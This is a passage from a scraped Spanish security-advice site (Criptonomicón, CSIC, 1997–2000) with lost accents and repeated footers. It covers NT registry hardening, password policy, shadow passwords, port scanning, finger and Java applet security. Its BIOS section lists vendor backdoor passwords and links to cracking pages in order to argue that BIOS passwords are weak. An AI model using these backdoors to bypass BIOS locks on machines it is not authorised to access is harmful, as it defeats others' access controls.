sesin. Esta posibilidad presenta un problema de seguridad que se agrava en el caso
de los servidores cuya ubicacin fsica no est protegida. Si esta caracterstica
estuviera habilitada cualquiera podra apagar el sistema desde el cuadro de dilogo de
autentificacin, con la consecuente perdida de servicios y recursos para los clientes
que estuvieran haciendo uso de l.
- -Ruta: HKLM\SYSTEM\CurrentControlSet\Services\RemoteAccess Variable:
Parameters Valor: 1
- -Ruta: HKLM\SYSTEM\CurrentControlSet\Control\LSA
Variable: FullPrivilegeAuditing Valor: 1
En el primer caso estaremos habilitando la auditora de los servicios de acceso
remoto. Con la segunda variable conseguiremos auditar todos los derechos de
usuarios, que nos ayudar para poder controlar si algn usuario utiliza ciertos
derechos administrativos para llegar a ficheros confidenciales o que entraen riesgos
al sistema.
- -Ruta: HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon
Variables: LegalNoticeCaption LegalNoticeText
Con ests dos entradas podremos habilitar una aviso que se dispare a modo de
ventana cada vez que se inicie la sesin. Esta prctica se recomienda en entornos
corporativos, y puede contener avisos legales, consejos, o normas internas, que
pueden prevenir de un mal uso de la red y reprimir intentos de sabotajes.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Para evitar dar facilidades en este sentido se pueden configurar nuestros sistemas
para que nicamente utilicen el sistema de autenticacin LanManager cuando se
necesite. Para ello deberemos igualar la variable LMCompatibilityLevel a 1.
HKLM\System\CurrentControlSet\Control\LSA Variable: LMCompatibilityLevel
Valor: 1
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Ten en cuenta, claro, que quien te quiera responder a tu boletn, solamente tiene la
opcin de hacerlo publicando otro en el mismo foro que t, pero no puede
responderte "personalmente" a una direccin... que no existe.
Puedes aprender ms sobre spam.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Di NO al spam
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Di NO al spam
ltimamente, el spam se ha convertido en una de las peores plagas que asolan
Internet. La mayor parte del correo basura est constituido por anuncios comerciales,
normalmente de productos dudosos, pornografa, mtodos fantasiosos para hacerse
rico o servicios en la frontera de la legalidad. Estrictamente hablando, no existe
forma humana (ni mecnica) de evitarlo por completo. Sin embargo, s que se pueden
apuntar una serie de sugerencias, que si bien no nos impermeabilizarn al correo
basura, al menos lo harn disminuir significativamente.
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Netscape Messenger
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Di NO al spam
Consejos prcticos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Referencias
Libro de Visitas
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Consejos para
administradores
Consejos para
usuarios
Fuente: www.hotmail.es
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Passwords fuertes en NT
Passwords de la BIOS
Passwords en la sombra
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Passwords fuertes en NT
Consejos para
administradores
Consejos para
usuarios
Passwords fuertes en NT
Pregunta: Cul es el eslabn ms dbil de la cadena de seguridad en sistemas
informticos?
Respuesta: El usuario final.
Dale a un usuario la oportunidad de elegir libremente su password e inventar
palabras de paso como juan98 (se llama Juan, claro) o leire93 (su mujer y el ao de
su boda). Con esa clase de passwords, las medidas de seguridad ms extremas a
menudo no sirven de nada.
Windows NT 4.0 Service Pack 2 incluye una nueva DLL (Passfilt.dll) que permite
obligar que los usuarios introduzcan passwords fuertes, al incorporar la siguiente
poltica:
1. Los passwords deben tener una longitud mnima de 6 caracteres.
2. Los passwords deben contener caracteres de al menos tres de las siguientes cuatro
clases: a) Letras maysculas b) Letras minsculas c) Nmeros d) Caracteres
especiales no alfanumricos, como signos de puntuacin
3. Los passwords no podrn contener el nombre de usuario ni otra parte del nombre
completo del usuario.
Para ms informacin e instrucciones de instalacin se puede consultar la pgina de
Microsoft.
(Nota: para consultar esa pgina antes hay que registrarse en el servicio de soporte de
Microsoft, gratuitamente)
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
Passwords fuertes en NT
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Passwords en la BIOS
Consejos para
administradores
Consejos para
usuarios
Passwords en la BIOS
Normalmente, los ordenadores incorporan la capacidad de proteger mediante
password el acceso a los datos de configuracin de la BIOS. Esta utilidad resulta de
extremado inters en entornos multiusuario como un laboratorio o el centro de
clculo de una universidad, donde pululan cientos de estudiantes, muchos de ellos
malvolos, que por motivos difciles de explicar sienten la necesidad de cambiar la
configuracin de la BIOS, a menudo con consecuencias desastrosas para el
ordenador... y para el encargado de la sala.
Sin embargo, no todo el monte es organo. Los fabricantes de BIOS suelen utilizar
puertas traseras, que aunque tericamente slo deberan conocer ellos, terminan
saliendo a la luz, como AWARD BIOS, que se puede romper con AWARD_SW,
AWARD_PW o j262. AMIBIOS y Phoenix tambin poseen los suyos.
Ms fcil puede ser resetear la memoria de la BIOS quitando la pila de la placa base
y volvindola a conectar. A veces basta con cambiar un simple jumper.
Adems, existen multitud de programas para saltarse estas barreras, que se pueden
encontrar en las siguientes localizaciones:
http://www.hedgie.com/passwords/bios.html
http://hem.passagen.se/unaxor/cracking.html
http://www.voicenet.com/~raze/files/textfaq/pchack.txt
http://www.geocities.com/Area51/Zone/6430/cracking.html
Por lo tanto, no hay que confiar en los passwords de la BIOS para proteger el sistema
y se debe preparar un sistema de proteccin ms seguro. Eso, claro est, queda a la
discrecin del administrador.
(Elaborado a partir del mensaje de Paul L Schmehl(pauls@UTDALLAS.EDU) a la
lista de NTBuqTraq)
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Passwords en la BIOS
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Passwords en la sombra
Consejos para
administradores
Consejos para
usuarios
Passwords en la sombra
Qu puede ocurrir si el archivo ms famoso de Unix, el celebrrimo /etc/passwd,
cae en manos de un atacante? No tiene ms que ejecutar su programa revientaclaves
favorito y sentarse a esperar hasta que empiecen a aparecer nombres de usuario con
sus respectivas contraseas. Con suerte, si el administrador es ingenuo o dejado,
incluso dar con la clave del root, abrindosele as las puertas a la mquina objetivo.
S, pero es muy difcil que se hagan con el fichero /etc/passwd, lo tengo bien
protegido, se dirn algunos administradores. Eso crees? No tienes ms que visitar
mi pgina sobre agujeros en Netscape, donde encontrars una demostracin de un
agujero en Netscape Communicator 4.5 que permite leer el fichero en cuestin. Haz
la prueba!
Afortunadamente, este problema tiene fcil solucin. Utiliza las contraseas en la
sombra, en otras palabras, un segundo fichero que contiene las contraseas cifradas y
slo accesible por root, mientras que el /etc/passwd ya no contiene ms que un * en
el lugar donde deberan aparecer las contraseas cifradas.
Puedes descargar el paquete de Shadow Passwords desde cualquiera de los siguientes
sitios, con instrucciones para su instalacin:
ftp://i17linuxb.ists.pwr.wroc.pl/pub/linux/shadow/shadow-current.tar.gz
ftp://ftp.icm.edu.pl/pub/Linux/shadow/shadow-current.tar.gz
ftp://iguana.hut.fi/pub/linux/shadow/shadow-current.tar.gz
ftp://ftp.cin.net/usr/ggallag/shadow/shadow-current.tar.gz
ftp://ftp.netural.com/pub/linux/shadow/shadow-current.tar.gz
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Actualizar y configurar
Consejos para
administradores
Consejos para
usuarios
Actualizar y configurar
Sabas cul es la causa principal de los ataques con xito a los sistemas infomticos?
Versiones sin actualizar. S, la utilizacin de una versin del programa que sea que
no ha sido actualizada en meses, a veces incluso en aos. Me refiero a software tanto
en pequeas mquinas personales (cuntos de los que estis leyendo este boletn
usis una versin de Netscape o Explorer anterior a la 4.x?) hasta el software de red
de grandes mquinas Unix o servidores NT, software al que no se la han aplicado los
parches pertinentes, o bien que no se ha actualizado convenientemente con la ltima
versin disponible por el fabricante.
Por lo tanto, si deseas disminuir los riesgos a los que se expone tu sistema, ya sea un
modesto PC en casa o un gran ordenador de la Administracin, es muy importante
que revises el software que utiliza, especialmente aquel que tenga que ver con la
conectividad a Internet, administracin de servicios de Red, etc., y lo actualices o
parchees con las ltimas actualizaciones disponibles.
A menudo no resulta una buena idea utilizar la ltima versin, sino la anteltima, ya
que al ritmo trepidante al que se lanzan nuevas versiones de productos (este lunes
Netscape anunci la beta del Communicator 5.0), la ltima y flamante versin, con
posibles despliegues de nuevas funcionalidades e interfaces psicodlicos, con toda
seguridad no habr sido puesta a prueba en su fase de diseo ni ha sido
suficientemente validada por la comunidad de usuarios. A veces ms vale esperar,
aunque eso s, no con la primera versin del producto.
Por ltimo, no basta con instalar la versin ms reciente. Es igualmente configurarla
correctamente, de manera que se cierren los resquicios que puedan dejar las
instalaciones por defecto. Esta correcta configuracin es importante no slo en los
sistemas operativos (ver la noticia 5. Nuevo agujero en NT 4 en este boletn) sino
tambin en el software en general (por ejemplo, ya sabemos que los navegadores
incorporan por defecto una poltica de seguridad muy dbil).
En definitiva, se trata de mucho trabajo aadido, en la medida en que exige
mantenerse al da de la evolucin de los productos, as como conocerlos a fondo para
poder configurarlos correctamente. Nadie dijo que la seguridad fuera cosa de nios.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Actualizar y configurar
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Escaneo de puertos
Consejos para
administradores
Consejos para
usuarios
Escaneo de puertos
Los servicios TCP/IP, como la Web o Ftp, permanecen a la escucha de un
puerto determinado. La funcin de un escaneador de puertos consiste en
escanear un rango de direcciones IP en busca de servicios a la escucha en
algn puerto. En una gran red puede ser posible que existan servicios
ilegales escuchando en algn puerto poco frecuente, de manera que algn
trabajador utilice la red corporativa para montar su propio servidor Web o
servidor de ficheros, sin pagar a un proveedor de servicios.
Para detectar este tipo de abusos, que pueden llegar a comprometer
seriamente la seguridad o ser el resultado de un ataque previo, conviene
correr de vez en cuando un escaneador de puertos como UltraScan o Saint.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Dedos acusadores
Consejos para
administradores
Consejos para
usuarios
Dedos acusadores
Cuando se utiliza el servicio de finger para interrogar a un servidor, a menudo ste
revela ms informacin sobre s mismo y sus usuarios de la que sera deseable: el
shell que est utilizando cada usuario, su directorio base y grupo a que pertenece, su
nombre de usuario, a menudo acompaado del nombre real y de su nmero de
telfono y direccin. Debido a que adems suele proporcionar informacin sobre la
hora del ltimo login, un atacante podra confeccionar patrones de trabajo de los
distintos usuarios.
En definitiva, se trata de mucha informacin valiosa como para distribuirla
alegremente. Piensa si realmente resulta til que esa informacin est disponible para
cualquier usuario de Internet o si convendra mejor eliminar ese servicio de finger.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es Java
Barreras de seguridad
Prohibido
Agujeros
Lneas futuras
Consejos
Recursos
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Seguridad en Java
Suscripcin gratis
Intimidad?
Seguridad en Java
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Qu es Java
Barreras de seguridad
Prohibido
Agujeros
Lneas futuras
Sin embargo, la caracterstica ms atractiva de Java desde el punto Cmo firmar applets
de vista de Internet, sus applets, que se pueden ejecutar en
cualquier plataforma con cualquier sistema operativo, constituyen
Consejos
tambin su taln de Aquiles. Si desde cualquier pgina Web que
visitamos nos pueden enviar una applet que se ejecute en nuestro
Recursos
ordenador sin nuestro conocimiento, todo tipo de ataques podra
tener lugar: esas applets podran cifrar el contenido de nuestro
disco duro y luego su autor pedirnos una suma millonaria por entregarnos la clave;
podran introducirnos virus; podran robar todo tipo de informacin de nuestro
ordenador; podran explotar recursos de nuestro sistema, como ciclos de CPU, y un
largo etctera fcil de imaginar.
Agujeros
Spam
Remailers
Anonimato
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Correo seguro
Web seguro
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Seguridad en Java
Consejos prcticos
Referencias
Libro de Visitas
Barreras de seguridad
Prohibido
Agujeros
Lenguaje simple
Lneas futuras
Consejos
Recursos
Caractersticas de
Java
Cmo funciona
Orientado a objetos
Java fue diseado como un lenguaje orientado a objetos desde el principio. Los
objetos agrupan en estructuras encapsuladas tanto sus datos como los mtodos (o
funciones) que manipulan esos datos. La tendencia del futuro, a la que Java se suma,
apunta hacia la programacin orientada a objetos, especialmente en entornos cada
vez ms complejos y basados en red.
Distribuido
Java proporciona una coleccin de clases para su uso en aplicaciones de red, que
permiten abrir sockets y establecer y aceptar conexiones con servidores o clientes
remotos, facilitando as la creacin de aplicaciones distribuidas.
Robusto
Java fue diseado para crear software altamente fiable. Para ello proporciona
numerosas comprobaciones en compilacin y en tiempo de ejecucin. Sus
caractersticas de memoria liberan a los programadores de una familia entera de
errores (la aritmtica de punteros), ya que se ha prescindido por completo los
punteros, y la recoleccin de basura elimina la necesidad de liberacin explcita de
memoria.
Seguro (?)
Dada la naturaleza distribuida de Java, donde las applets se bajan desde cualquier
punto de la Red, la seguridad se impuso como una necesidad de vital importancia. A
nadie le gustara ejecutar en su ordenador programas con acceso total a su sistema,
procedentes de fuentes desconocidas. As que se implementaron barreras de
seguridad en el lenguaje y en el sistema de ejecucin en tiempo real.
Indiferente a la arquitectura
Java est diseado para soportar aplicaciones que sern ejecutadas en los ms
variados entornos de red, desde Unix a Windows Nt, pasando por Mac y estaciones
de trabajo, sobre arquitecturas distintas y con sistemas operativos diversos. Para
acomodar requisitos de ejecucin tan variopintos, el compilador de Java genera
bytecodes: un formato intermedio indiferente a la arquitectura diseado para
transportar el cdigo eficientemente a mltiples plataformas hardware y software. El
resto de problemas los soluciona el intrprete de Java.
Portable
La indiferencia a la arquitectura representa slo una parte de su portabilidad.
Adems, Java especifica los tamaos de sus tipos de datos bsicos y el
comportamiento de sus operadores aritmticos, de manera que los programas son
iguales en todas las plataformas.
Estas dos ltimas caractersticas se conocen como la Mquina Virtual Java (JVM).
Alto rendimiento
Multihebra
Hoy en da ya se ven como terriblemente limitadas las aplicaciones que slo pueden
ejecutar una accin a la vez. Java soporta sincronizacin de mltiples hilos de
ejecucin (multithreading) a nivel de lenguaje, especialmente tiles en la creacin de
aplicaciones de red distribuidas. As, mientras un hilo se encarga de la comunicacin,
otro puede interactuar con el usuario mientras otro presenta una animacin en
pantalla y otro realiza clculos.
Dinmico
El lenguaje Java y su sistema de ejecucin en tiempo real son dinmicos en la fase de
enlazado. Las clases slo se enlazan a medida que son necesitadas. Se pueden enlazar
nuevos mdulos de cdigo bajo demanda, procedente de fuentes muy variadas,
incluso desde la Red.
Produce applets
Java puede ser usado para crear dos tipos de programas: aplicaciones independientes
y applets.
Las aplicaciones independientes se comportan como cualquier otro programa escrito
en cualquier lenguaje, como por ejemplo el navegador de Web HotJava, escrito
ntegramente en Java.
Por su parte, las applets son pequeos programas que aparecen embebidos en las
pginas Web, como aparecen los grficos o el texto, pero con la capacidad de
ejecutar acciones muy complejas, como animar imgenes, establecer conexiones de
red, presentar mens y cuadros de dilogo para luego emprender acciones, etc.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es Java
Prohibido
Agujeros
Lneas futuras
Consejos
Recursos
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Barreras de seguridad
Agujeros
Lneas futuras
Consejos
Recursos
Restricciones de seguridad
En primer lugar, es importante hacer notar que las restricciones son distintas para
cada navegador, ya que cada uno ofrece su propia poltica de seguridad. La poltica
de Netscape Navigator, por ejemplo, es mucho ms restrictiva que la de HotJava de
Sun.
En cualquier caso, la mayora de los navegadores presentarn las siguientes
restricciones a la hora de ejecutar applets:
No se puede trabajar con el sistema de ficheros: leer, escribir, borrar,
renombrar, listar, conseguir informacin, ejecutar programas, etc.
No se pueden establecer conexiones de red a mquinas distintas que la que
envi el applet
No se permite acceso al sistema
No se permite manipulacin de threads
No se pueden cargar mtodos nativos
No se pueden evitar mensajes de alerta en las ventanas creadas por el applet
No se pueden crear subclases de SecurityManager en una applet
No se permiten puertas traseras
Para abreviar, todas las restricciones anteriores pueden reducirse a dos reglas:
No se puede trabajar con ficheros en la mquina del usuario a menos que ste
lo permita
No se puede conectar a nada en la Red ms que a la mquina que envi la
applet
En la prctica, estas restricciones son tan estrictas para las applets descargadas
remotamente que slo pueden acceder los recursos muy limitados disponibles dentro
del patio de juegos, como expresa muy grficamente la siguiente figura tomada de Li
Gong.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es Java
Barreras de seguridad
Prohibido
Lneas futuras
Consejos
Recursos
Ataques
Robo de informacin
Destruccin de
informacin
Robo de recursos
Denegacin de servicio
Enmascaramiento
Engao
Lnea Maginot
Qu es Java
Barreras de seguridad
Prohibido
Agujeros
Consejos
Recursos
Un rasgo tpico de que ya gozan las applets es la capacidad de ser firmadas por
alguna autoridad de certificacin. De esta manera, al presentar las applets una firma
digital, el usuario puede decidir si la applet en cuestin es de confianza o no. Las
applets seguras tendrn el privilegio de acceder de forma controlada a los recursos,
mientras que al resto de las applets se les negar como hasta ahora. Puedes encontrar
ms informacin en el captulo sobre cmo firmar applets de Java.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Barreras de seguridad
Prohibido
Agujeros
Lneas futuras
Recursos
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es Java
Barreras de seguridad
Prohibido
Agujeros
Lneas futuras
Denial of service
Java Security
Consejos
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Qu es Java
Barreras de seguridad
Prohibido
Agujeros
Lneas futuras
Consejos
Recursos
Pasos generales
Internet Explorer
Netscape
Inconvenientes
Comparacin
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es Java
Barreras de seguridad
Prohibido
Agujeros
Lneas futuras
Consejos
Recursos
Pasos generales
Internet Explorer
Netscape
Inconvenientes
Comparacin
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es Java
Barreras de seguridad
Prohibido
Agujeros
Lneas futuras
Consejos
Recursos
Pasos generales
Internet Explorer
Netscape
Inconvenientes
Comparacin
ejemplo, para crear un certificado para Gonzalo del CSIC, se puede escribir lo
siguiente (en negrita aparece lo que se debe introducir en la lnea de comandos):
signtool -G gonzalo -d c:\netscape\users\gonzalo
using certificate directory: c:\netscape\users\gonzalo
Enter certificate information. All fields are optional. Acceptable
characters are numbers, letters, spaces, and apostrophes.
certificate common name: Certificado para pruebas
organization: CSIC
organization unit: TIC
state or province: Madrid
country (must be exactly 2 characters): ES
username: gonzalo
email address: gonzalo@iec.csic.es
Enter Password or Pin for "Communicator Certificate DB": [no se produce eco]
generated public/private key pair
certificate request generated
certificate has been signed
certificate "gonzalo" added to database
Exported certificate to x509.raw and x509.cacert.
Si en el paso anterior se especific la opcin -d junto con el camino donde se
encuentra la base de datos de claves y de certificados de Communicator, la base ya
ha quedado automticamente actualizada. La prxima vez que se arranque
Communicator, si se pulsa el botn de Seguridad de la barra de herramientas, en
Certificados y a continuacin en Propios se comprobar que aparece el recin creado.
Se puede comprobar que el certificado se ha instalado correctamente tambin
mediante signtool, con la opcin -l:
signtool -l
using certificate directory: .
Object signing certificates
--------------------------------------gonzalo
Issued by: gonzalo (Certificado para pruebas)
Expires: Sun Apr 11, 1999
--------------------------------------For a list including CA's, use "signtool -L"
Con este certificado ya se est listo para firmar applets. Ahora bien, no basta con
firmarlos. Para que los usuarios puedan ejecutar applets firmados es necesario que
instalen en su versin de Communicator el certificado que se acaba de generar. Si se
hace un listado del directorio donde se est trabajando, se observar que signtool ha
creado dos ficheros automticamente, x509.cacert y x509.raw. El primero de ellos
contiene el certificado en formato base64. Para que quede a disposicin de cualquiera
que lo necesite, se seguirn los siguientes pasos:
Crear un enlace al fichero x509.cacert en una pgina Web
file:///C|/TEMP/criptonomicon/criptonomicon/java/nc.html (2 of 5) [25/10/2000 02:31:41 p.m.]
PrivilegeManager.revertPrivilege("UniversalPropertyRead");
Puedes consultar el listado completo de los recursos que se pueden acceder. La
documentacin completa sobre este API donde se detalla su funcionamiento se puede
obtener gratuitamente.
El mayor inconveniente de este enfoque es que exige la modificacin del applet y
adems, como consecuencia de los cambios introducidos, no funcionar ya en ningn
otro navegador, tirando por tierra la filosofa de Java de "Escribir una vez, ejecutar
en cualquier sitio".
signtool -v abednego.jar
using certificate directory: .
archive "abednego.jar" has passed crypto verification.
status path
------------ ------------------verified abednego.class
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es Java
Barreras de seguridad
Prohibido
Agujeros
Lneas futuras
Consejos
Recursos
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Netscape
Microsoft
SignTool 1.1
file:///C|/TEMP/criptonomicon/criptonomicon/images/advertencianc.gif
file:///C|/TEMP/criptonomicon/criptonomicon/images/certificadonc.gif
Renegado de Netscape
Suscripcin gratis
Intimidad?
Renegado de Netscape
Artculos
Seguridad
Linux
Navegacin segura
